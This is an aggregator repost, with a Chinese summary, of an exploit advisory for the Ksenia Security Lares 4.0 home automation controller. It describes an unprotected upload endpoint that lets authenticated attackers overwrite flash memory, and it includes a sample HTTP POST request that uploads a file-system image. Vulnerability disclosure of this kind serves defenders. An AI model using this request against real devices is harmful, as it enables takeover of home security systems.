Ksenia Security Lares 4.0 Home Automation Remote Code Execution
Ksenia Security Lares 4.0设备存在未受保护的上传端点漏洞,允许经过身份验证的攻击者上传MPFS文件系统镜像,覆盖闪存中的程序内存,可能导致远程代码执行。 2025-4-1 19:59:7 Author: cxsecurity.com(查看原文) 阅读量:18 收藏

# Exploit Title: Ksenia Security Lares 4.0 Home Automation Remote Code Execution # Google Dork: N/A # Date: 31 March 2025 # Exploit Author: Mencha 'ShadeLock' Isajlovska # Vendor Homepage: https://www.kseniasecurity.com/en/ # Software Link: https://www.kseniasecurity.com/en/company/why-lares-4-0.html # Version: Lares 4.0 # Tested on: Ksenia Lares Webserver # CVE : N/A # Desc: The device provides access to an unprotected endpoint, enabling the upload of MPFS File System binary images. Authenticated attackers can exploit this vulnerability to overwrite the flash program memory containing the web server's main interfaces, potentially leading to arbitrary code execution. POST /upload HTTP/1.1 Host: 192.168.1.2 ------WebKitFormBoundary5GYWB4nichZAk7BS Content-Disposition: form-data; name="i"; filename="MPFSImage.bin" Content-Type: application/octet-stream ------WebKitFormBoundary5GYWB4nichZAk7BS--



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2025040006
如有侵权请联系:admin#unsafe.sh